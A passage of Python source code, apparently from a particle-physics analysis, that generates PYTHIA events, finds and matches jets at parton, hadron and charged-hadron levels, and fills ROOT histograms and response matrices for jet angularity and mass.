lists_grooming = [self.obs_grooming_settings[obs] for obs in self.observable_list]
for observable in lists_grooming:
for setting in observable:
if setting not in self.grooming_settings and setting != None:
self.grooming_settings.append(setting)
# Manually added binnings for RM and scaling histograms
self.pt_bins = array('d', list(range(5, 210, 5)))
self.obs_bins_ang = np.concatenate((np.linspace(0, 0.0009, 10), np.linspace(0.001, 0.009, 9),
np.linspace(0.01, 0.1, 19), np.linspace(0.11, 1., 90)))
self.obs_bins_mass = np.concatenate(
(np.linspace(0, 0.9, 10), np.linspace(1, 9.8, 45), np.linspace(10, 14.5, 10),
np.linspace(15, 19, 5), np.linspace(20, 60, 9)))
# hadron level - ALICE tracking restriction
self.max_eta_hadron = 0.9
# Whether or not to rescale final jet histograms based on sigma/N
self.no_scale = args.no_scale
# Whether or not to save particle info in raw tree structure
self.no_tree = args.no_tree
#---------------------------------------------------------------
# Initialize histograms
#---------------------------------------------------------------
def initialize_hist(self):
self.hNevents = ROOT.TH1I("hNevents", 'Number accepted events (unscaled)', 2, -0.5, 1.5)
self.hNeventsMPI = ROOT.TH1I("hNeventsMPI", 'Number accepted events (unscaled)', 2, -0.5, 1.5)
for jetR in self.jetR_list:
# Store a list of all the histograms just so that we can rescale them later
hist_list_name = "hist_list_R%s" % str(jetR).replace('.', '')
setattr(self, hist_list_name, [])
hist_list_name_MPIon = "hist_list_MPIon_R%s" % str(jetR).replace('.', '')
setattr(self, hist_list_name_MPIon, [])
R_label = "R" + str(jetR).replace('.', '') + 'Scaled'
for MPI in ["", "MPIon_"]:
R_label = MPI + R_label
list_name = hist_list_name_MPIon if MPI else hist_list_name
if self.level in [None, 'ch']:
name = 'hJetPt_ch_%s' % R_label
h = ROOT.TH1F(name, name+';p_{T}^{ch jet};#frac{dN}{dp_{T}^{ch jet}};', 300, 0, 300)
h.Sumw2() # enables calculation of errors
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_ch_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{ch jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{ch jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
if self.level in [None, 'h']:
name = 'hJetPt_h_%s' % R_label
h = ROOT.TH1F(name, name+';p_{T}^{jet, h};#frac{dN}{dp_{T}^{jet, h}};', 300, 0, 300)
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_h_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{h jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{h jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
if self.level in [None, 'p']:
name = 'hJetPt_p_%s' % R_label
h = ROOT.TH1F(name, name+';p_{T}^{jet, parton};#frac{dN}{dp_{T}^{jet, parton}};',
300, 0, 300)
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_p_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{p jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{p jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
if self.level == None:
name = 'hJetPtRes_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 200, -1., 1.)
h.GetXaxis().SetTitle('#it{p}_{T}^{parton jet}')
h.GetYaxis().SetTitle(
'#frac{#it{p}_{T}^{parton jet}-#it{p}_{T}^{ch jet}}{#it{p}_{T}^{parton jet}}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hResponse_JetPt_%s' % R_label
h = ROOT.TH2F(name, name, 200, 0, 200, 200, 0, 200)
h.GetXaxis().SetTitle('#it{p}_{T}^{parton jet}')
h.GetYaxis().SetTitle('#it{p}_{T}^{ch jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
'''
# Jet multiplicity for matched jets with a cut at ch-jet level
name = 'hNconstit_Pt_ch_PtBinCH60-80_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{ch jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{ch jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_h_PtBinCH60-80_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{h jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{h jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
name = 'hNconstit_Pt_p_PtBinCH60-80_%s' % R_label
h = ROOT.TH2F(name, name, 300, 0, 300, 50, 0.5, 50.5)
h.GetXaxis().SetTitle('#it{p}_{T}^{parton jet}')
h.GetYaxis().SetTitle('#it{N}_{constit}^{parton jet}')
h.Sumw2()
setattr(self, name, h)
getattr(self, list_name).append(h)
'''
for obs in self.observable_list:
if obs != "ang" and obs != "mass":
raise ValueError("Observable %s not yet implemented in this script!" % obs)
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
obs_bins = getattr(self, "obs_bins_"+obs)
if self.level in [None, 'ch']:
name = 'h_%s_JetPt_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{ch jet}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'h_%s_JetPt_ch_MPIon_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{ch jet}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name_MPIon).append(h)
if self.level in [None, 'h']:
name = 'h_%s_JetPt_h_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{jet, h}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{h}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
if self.level in [None, 'p']:
name = 'h_%s_JetPt_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(self.pt_bins)-1, self.pt_bins,
len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle('p_{T}^{jet, parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
if self.level == None:
name = 'hResponse_%s_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, len(obs_bins)-1, obs_bins, len(obs_bins)-1, obs_bins)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
'''
name = 'hResponse_%s_PtBinCH20-40_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 100, 0, 1, 100, 0, 1)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hResponse_%s_PtBinCH40-60_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 100, 0, 1, 100, 0, 1)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hResponse_%s_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 100, 0, 1, 100, 0, 1)
h.GetXaxis().SetTitle(self.obs_names[obs]+'^{parton}')
h.GetYaxis().SetTitle(self.obs_names[obs]+'^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Phase space plots integrated over all pT bins
name = 'hPhaseSpace_DeltaR_Pt_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_DeltaR_Pt_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Phase space plots binned in ch jet pT
name = 'hPhaseSpace_DeltaR_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_DeltaR_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
150, 0, 1.5)
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{ch jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_DeltaR_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, 150, 0, 1.5,
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(#Delta R_{i})_{parton jet} / R')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{ch jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{ch jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hPhaseSpace_%s_Pt_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.n_pt_bins, self.pt_limits[0], self.pt_limits[1],
self.n_lambda_bins, self.lambda_limits[0], self.lambda_limits[1])
h.GetXaxis().SetTitle('(p_{T, i})_{parton jet}')
h.GetYaxis().SetTitle('(#lambda_{#alpha=%s, i})_{parton jet}' % str(alpha))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Annulus plots for amount of lambda contained within some r < R
self.annulus_plots_num_r = 150
self.annulus_plots_max_x = 1.5
low_bound = self.annulus_plots_max_x / self.annulus_plots_num_r / 2.
up_bound = self.annulus_plots_max_x + low_bound
name = 'hAnnulus_%s_ch_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{ch jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{ch jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hAnnulus_%s_ch_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{ch jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{ch jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hAnnulus_%s_p_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{parton jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{parton jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = 'hAnnulus_%s_p_PtBinCH60-80_%sScaled' % (obs, label)
h = ROOT.TH2F(name, name, self.annulus_plots_num_r, low_bound, up_bound,
100, 0, 1.)
h.GetXaxis().SetTitle('(#it{r} / #it{R})_{parton jet}')
h.GetYaxis().SetTitle(
('(#frac{#lambda_{#alpha=%s}(#it{r})}' + \
'{#lambda_{#alpha=%s}(#it{R})})_{parton jet}') % (str(alpha), str(alpha)))
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
'''
name = "h_%sResidual_JetPt_%sScaled" % (obs, label)
h = ROOT.TH2F(name, name, 300, 0, 300, 200, -3., 1.)
h.GetXaxis().SetTitle('p_{T}^{jet, parton}')
h.GetYaxis().SetTitle(
'#frac{' + self.obs_names[obs] + '^{parton}-' + \
self.obs_names[obs] + '^{ch}}{' + self.obs_names[obs] + '^{parton}}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
name = "h_%sDiff_JetPt_%sScaled" % (obs, label)
h = ROOT.TH2F(name, name, 300, 0, 300, 200, -2., 2.)
h.GetXaxis().SetTitle('#it{p}_{T}^{jet, ch}')
h.GetYaxis().SetTitle(self.obs_names[obs] + '^{parton}-' + \
self.obs_names[obs] + '^{ch}')
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Create THn of response
dim = 4
title = ['p_{T}^{ch jet}', 'p_{T}^{parton jet}',
self.obs_names[obs]+'^{ch}', self.obs_names[obs]+'^{parton}']
nbins = [len(self.pt_bins)-1, len(self.pt_bins)-1,
len(obs_bins)-1, len(obs_bins)-1]
min_li = [self.pt_bins[0], self.pt_bins[0],
obs_bins[0], obs_bins[0] ]
max_li = [self.pt_bins[-1], self.pt_bins[-1],
obs_bins[-1], obs_bins[-1] ]
name = 'hResponse_JetPt_%s_ch_%sScaled' % (obs, label)
nbins = (nbins)
xmin = (min_li)
xmax = (max_li)
nbins_array = array('i', nbins)
xmin_array = array('d', xmin)
xmax_array = array('d', xmax)
h = ROOT.THnF(name, name, dim, nbins_array, xmin_array, xmax_array)
for i in range(0, dim):
h.GetAxis(i).SetTitle(title[i])
if i == 0 or i == 1:
h.SetBinEdges(i, self.pt_bins)
else: # i == 2 or i == 3
h.SetBinEdges(i, obs_bins)
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Another set of THn for full hadron folding
title = ['p_{T}^{h jet}', 'p_{T}^{parton jet}',
self.obs_names[obs] + '^{h}', self.obs_names[obs] + '^{parton}']
name = 'hResponse_JetPt_%s_h_%sScaled' % (obs, label)
h = ROOT.THnF(name, name, dim, nbins_array, xmin_array, xmax_array)
for i in range(0, dim):
h.GetAxis(i).SetTitle(title[i])
if i == 0 or i == 1:
h.SetBinEdges(i, self.pt_bins)
else: # i == 2 or i == 3
h.SetBinEdges(i, obs_bins)
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name).append(h)
# Finally, a set of THn for folding H --> CH (with MPI on)
title = ['p_{T}^{ch jet}', 'p_{T}^{h jet}',
self.obs_names[obs] + '^{ch}', self.obs_names[obs] + '^{h}']
name = 'hResponse_JetPt_%s_Fnp_%sScaled' % (obs, label)
h = ROOT.THnF(name, name, dim, nbins_array, xmin_array, xmax_array)
for i in range(0, dim):
h.GetAxis(i).SetTitle(title[i])
if i == 0 or i == 1:
h.SetBinEdges(i, self.pt_bins)
else: # i == 2 or i == 3
h.SetBinEdges(i, obs_bins)
h.Sumw2()
setattr(self, name, h)
getattr(self, hist_list_name_MPIon).append(h)
#---------------------------------------------------------------
# Initiate jet defs, selectors, and sd (if required)
#---------------------------------------------------------------
def init_jet_tools(self):
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
if not self.no_tree:
# Initialize tree writer
name = 'particle_unscaled_R%s' % jetR_str
t = ROOT.TTree(name, name)
setattr(self, "t_R%s" % jetR_str, t)
tw = RTreeWriter(tree=t)
setattr(self, "tw_R%s" % jetR_str, tw)
# set up our jet definition and a jet selector
jet_def = fj.JetDefinition(fj.antikt_algorithm, jetR)
setattr(self, "jet_def_R%s" % jetR_str, jet_def)
print(jet_def)
pwarning('max eta for particles after hadronization set to', self.max_eta_hadron)
parts_selector_h = fj.SelectorAbsEtaMax(self.max_eta_hadron)
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
jet_selector = fj.SelectorPtMin(5.0) & \
fj.SelectorAbsEtaMax(self.max_eta_hadron - jetR)
setattr(self, "jet_selector_R%s" % jetR_str, jet_selector)
#max_eta_parton = self.max_eta_hadron + 2. * jetR
#setattr(self, "max_eta_parton_R%s" % jetR_str, max_eta_parton)
#pwarning("Max eta for partons with jet R =", jetR, "set to", max_eta_parton)
#parts_selector_p = fj.SelectorAbsEtaMax(max_eta_parton)
#setattr(self, "parts_selector_p_R%s" % jetR_str, parts_selector_p)
count1 = 0 # Number of jets rejected from ch-h matching
setattr(self, "count1_R%s" % jetR_str, count1)
count2 = 0 # Number of jets rejected from h-p matching
setattr(self, "count2_R%s" % jetR_str, count2)
#---------------------------------------------------------------
# Calculate events and pass information on to jet finding
#---------------------------------------------------------------
def calculate_events(self, pythia, MPIon=False):
iev = 0 # Event loop count
if MPIon:
hNevents = self.hNeventsMPI
else:
hNevents = self.hNevents
while hNevents.GetBinContent(1) < self.nev:
if not pythia.next():
continue
parts_pythia_p = pythiafjext.vectorize_select(pythia, [pythiafjext.kFinal], 0, True)
hstatus = pythia.forceHadronLevel()
if not hstatus:
#pwarning('forceHadronLevel false event', iev)
continue
#parts_pythia_h = pythiafjext.vectorize_select(
# pythia, [pythiafjext.kHadron, pythiafjext.kCharged])
parts_pythia_h = pythiafjext.vectorize_select(pythia, [pythiafjext.kFinal], 0, True)
parts_pythia_hch = pythiafjext.vectorize_select(
pythia, [pythiafjext.kFinal, pythiafjext.kCharged], 0, True)
""" TODO: fix for multiple jet R
parts_pythia_p_selected = parts_selector_p(parts_pythia_p)
parts_pythia_h_selected = parts_selector_h(parts_pythia_h)
parts_pythia_hch_selected = parts_selector_h(parts_pythia_hch)
if self.debug_level > 1:
pinfo('debug partons...')
for p in parts_pythia_p_selected:
pyp = pythiafjext.getPythia8Particle(p)
print(pyp.name())
pinfo('debug hadrons...')
for p in parts_pythia_h_selected:
pyp = pythiafjext.getPythia8Particle(p)
print(pyp.name())
pinfo('debug ch. hadrons...')
for p in parts_pythia_hch_selected:
pyp = pythiafjext.getPythia8Particle(p)
print(pyp.name())
"""
# Some "accepted" events don't survive hadronization step -- keep track here
hNevents.Fill(0)
self.find_jets_fill_trees(parts_pythia_p, parts_pythia_h, parts_pythia_hch, iev, MPIon)
iev += 1
#---------------------------------------------------------------
# Find jets, do matching between levels, and fill histograms & trees
#---------------------------------------------------------------
def find_jets_fill_trees(self, parts_pythia_p, parts_pythia_h, parts_pythia_hch,
iev, MPIon=False):
for jetR in self.jetR_list:
jetR_str = str(jetR).replace('.', '')
jet_selector = getattr(self, "jet_selector_R%s" % jetR_str)
jet_def = getattr(self, "jet_def_R%s" % jetR_str)
t = None; tw = None;
if not self.no_tree:
t = getattr(self, "t_R%s" % jetR_str)
tw = getattr(self, "tw_R%s" % jetR_str)
count1 = getattr(self, "count1_R%s" % jetR_str)
count2 = getattr(self, "count2_R%s" % jetR_str)
# parts = pythiafjext.vectorize(pythia, True, -1, 1, False)
jets_p = fj.sorted_by_pt(jet_selector(jet_def(parts_pythia_p)))
jets_h = fj.sorted_by_pt(jet_selector(jet_def(parts_pythia_h)))
jets_ch = fj.sorted_by_pt(jet_selector(jet_def(parts_pythia_hch)))
if MPIon:
if self.level:
for jet in locals()["jets_" + self.level]:
self.fill_unmatched_histograms(jetR, jet, self.level, MPI=True)
continue # Don't need to do matching
else:
for jet in jets_p:
self.fill_unmatched_histograms(jetR, jet, 'p', MPI=True)
for jet in jets_h:
self.fill_unmatched_histograms(jetR, jet, 'h', MPI=True)
for jet in jets_ch:
self.fill_unmatched_histograms(jetR, jet, 'ch', MPI=True)
else: # MPI off
if self.level:
for jet in locals()["jets_" + self.level]:
self.fill_unmatched_histograms(jetR, jet, self.level)
if not self.no_tree:
self.fill_unmatched_jet_tree(tw, jetR, iev, jet)
continue # Don't need to do matching
else:
for jet in jets_p:
self.fill_unmatched_histograms(jetR, jet, 'p')
for jet in jets_h:
self.fill_unmatched_histograms(jetR, jet, 'h')
for jet in jets_ch:
self.fill_unmatched_histograms(jetR, jet, 'ch')
# Start the matching procedure
for i,jchh in enumerate(jets_ch):
# match hadron (full) jet
drhh_list = []
for j, jh in enumerate(jets_h):
drhh = jchh.delta_R(jh)
if drhh < jetR / 2.:
drhh_list.append((j,jh))
if len(drhh_list) != 1:
count1 += 1
else: # Require unique match
j, jh = drhh_list[0]
# match parton level jet
dr_list = []
for k, jp in enumerate(jets_p):
dr = jh.delta_R(jp)
if dr < jetR / 2.:
dr_list.append((k, jp))
if len(dr_list) != 1:
count2 += 1
else:
k, jp = dr_list[0]
if self.debug_level > 0:
pwarning('event', iev)
pinfo('matched jets: ch.h:', jchh.pt(), 'h:', jh.pt(),
'p:', jp.pt(), 'dr:', dr)
if not MPIon:
self.fill_jet_histograms(jetR, jp, jh, jchh)
if not self.no_tree:
self.fill_matched_jet_tree(tw, jetR, iev, jp, jh, jchh)
else:
self.fill_jet_histograms_MPI(jetR, jp, jh, jchh)
#print(" |-> SD jet params z={0:10.3f} dR={1:10.3f} mu={2:10.3f}".format(
# sd_info.z, sd_info.dR, sd_info.mu))
if MPIon:
setattr(self, "count1_R%s_MPIon" % jetR_str, count1)
setattr(self, "count2_R%s_MPIon" % jetR_str, count2)
else:
setattr(self, "count1_R%s" % jetR_str, count1)
setattr(self, "count2_R%s" % jetR_str, count2)
#---------------------------------------------------------------
# Fill jet tree with (unscaled/raw) matched parton/hadron tracks
#---------------------------------------------------------------
def fill_matched_jet_tree(self, tw, jetR, iev, jp, jh, jch):
tw.fill_branch('iev', iev)
tw.fill_branch('ch', jch)
tw.fill_branch('h', jh)
tw.fill_branch('p', jp)
self.fill_unmatched_jet_tree(tw, jetR, iev, jp, level='p', save_iev=False)
self.fill_unmatched_jet_tree(tw, jetR, iev, jh, level='h', save_iev=False)
self.fill_unmatched_jet_tree(tw, jetR, iev, jch, level='ch', save_iev=False)
#---------------------------------------------------------------
# Fill jet tree with (unscaled/raw) unmatched parton/hadron tracks
#---------------------------------------------------------------
def fill_unmatched_jet_tree(self, tw, jetR, iev, jet, level='ch', save_iev=True):
if save_iev:
tw.fill_branch('iev', iev)
tw.fill_branch(level, jet)
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
jet_sd = None
if grooming_setting:
gshop = fjcontrib.GroomerShop(jet, jetR, self.reclustering_algorithm)
jet_sd = self.utils.groom(gshop, grooming_setting, jetR).pair()
obs_val = None
# Calculate angularities
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
obs_val = fjext.lambda_beta_kappa(jet, jet_sd, alpha, kappa, jetR)
else:
obs_val = fjext.lambda_beta_kappa(jet, alpha, kappa, jetR)
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
# Untagged jets -- record underflow value
obs_val = jet_sd.m() if jet_sd.has_constituents() else -1
else:
obs_val = jet.m()
else:
raise ValueError("Observable not implemented in fill_unmatched_jet_tree")
tw.fill_branch("%s_%s_%s" % (obs, level, label), obs_val)
#---------------------------------------------------------------
# Fill jet histograms for PYTHIA run-through before matching
#---------------------------------------------------------------
def fill_unmatched_histograms(self, jetR, jet, level, MPI=False):
# Observable-independent histograms
R_label = str(jetR).replace('.', '') + 'Scaled'
if MPI:
getattr(self, 'hJetPt_%s_MPIon_R%s' % (level, R_label)).Fill(jet.pt())
getattr(self, 'hNconstit_Pt_%s_MPIon_R%s' % (level, R_label)).Fill(jet.pt(), len(jet.constituents()))
else:
getattr(self, 'hJetPt_%s_R%s' % (level, R_label)).Fill(jet.pt())
getattr(self, 'hNconstit_Pt_%s_R%s' % (level, R_label)).Fill(jet.pt(), len(jet.constituents()))
for obs in self.observable_list:
for i in range(len(self.obs_settings[obs])):
obs_setting = self.obs_settings[obs][i]
grooming_setting = self.obs_grooming_settings[obs][i]
obs_label = self.utils.obs_label(obs_setting, grooming_setting)
label = ("R%s_%s" % (jetR, obs_label)).replace('.', '')
if MPI:
h = getattr(self, 'h_%s_JetPt_%s_MPIon_%sScaled' % (obs, level, label))
else:
h = getattr(self, 'h_%s_JetPt_%s_%sScaled' % (obs, level, label))
# Jet angularity histograms
if obs == "ang":
alpha = obs_setting
kappa = 1
if grooming_setting:
gshop = fjcontrib.GroomerShop(jet, jetR, self.reclustering_algorithm)
jet_sd = self.utils.groom(gshop, grooming_setting, jetR).pair()
h.Fill(jet.pt(), fjext.lambda_beta_kappa(jet, jet_sd, alpha, kappa, jetR))
else:
h.Fill(jet.pt(), fjext.lambda_beta_kappa(jet, alpha, kappa, jetR))
# Jet mass histograms
elif obs == "mass":
if grooming_setting:
gshop = fjcontrib.GroomerShop(jet, jetR, self.reclustering_algorithm)
jet_sd = self.utils.groom(gshop, grooming_setting, jetR).pair()
if not jet_sd.has_constituents():
# Untagged jet -- record underflow value
h.Fill(jet.pt(), -1)
else:
h.Fill(jet.pt(), jet_sd.m())
else:
h.Fill(jet.pt(), jet.m())
else:
raise ValueError("Observable not implemented in fill_unmatched_histograms")
#---------------------------------------------------------------
# Fill matched jet histograms
#---------------------------------------------------------------
def fill_jet_histograms(self, jetR, jp, jh, jch):
R_label = str(jetR).replace('.', '') + 'Scaled'
if self.level == None:
if jp.pt(): # prevent divide by 0
getattr(self, 'hJetPtRes_R%s' % R_label).Fill(jp.pt(), (jp.pt() - jch.pt()) / jp.pt())
